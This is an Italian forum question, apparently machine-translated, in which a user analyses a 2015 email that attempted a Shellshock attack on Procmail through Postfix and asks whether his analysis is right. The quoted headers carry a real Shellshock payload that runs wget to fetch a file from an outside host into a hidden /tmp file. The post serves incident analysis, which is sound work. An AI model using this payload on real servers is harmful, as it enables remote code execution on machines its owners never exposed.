attacco su analisi procmail Unix

4

2 giorni fa ho ricevuto la seguente e-mail (questo è il suo formato originale non quello di qualsiasi mailer, ma dove le informazioni sensibili sono sostituite da •• field_name ••):

From [email protected] Thu Jul 2 23:59:07 2015 Return-Path: <[email protected]> X-Original-To: nobody@••my_domain•• Delivered-To: nobody@••my_domain•• Received: from website.com (bearing.headissue.net [178.248.246.217]) by ••my_mail_server•• (Postfix) with SMTP id 9CE261C542901 for <nobody@••my_domain••>; Thu, 2 Jul 2015 23:59:07 +0200 (CEST) To:() { :; };wget -o/tmp/._ http://mlanissan.co.in/HELLOWORLD From:() { :; };wget -o/tmp/._ http://mlanissan.co.in/HELLOWORLD Status: RO Content-Length: 0 Lines: 0

  • attacco mirato verso Postfix MX dove MDA è Procmail
  • To: & I campi From: mirano a sparare Shellshock su bash che viene frequentemente utilizzato all'interno di Procmail regole
  • questo attacco avrebbe scaricato un malware da un sito di download in Siliguri (India) all'interno di /tmp/._ (file nascosto ai manichini)
  • in caso di un /etc/procmailrc esistente che viene eseguito con privilegi root , niente di più rischioso sarebbe stato eseguito automaticamente
  • l'origine della connessione è a Monaco, vicino all'Università
  • l'origine (@IP) dell'attacco è attiva ma non risponde a nessuna connessione tcp
  • il potenziale malware HTML porta un 404

Ecco alcune ipotesi personali su questo attacco:

  • il sito del downloader (mlanissan.co.in) è stato violato, utilizzato, rilevato e pulito dai suoi proprietari
  • il sito di controllo degli attacchi (bearing.headissue.net) è probabilmente un Unix in esecuzione, è stato violato, utilizzato e non ancora arrestato dai relativi proprietari, è ben protetto dagli hacker

La mia analisi e ipotesi sono corrette?

Hai qualche analisi e ipotesi migliore?

    
posta daniel Azuelos 04.07.2015 - 18:23
fonte

0 risposte

Leggi altre domande sui tag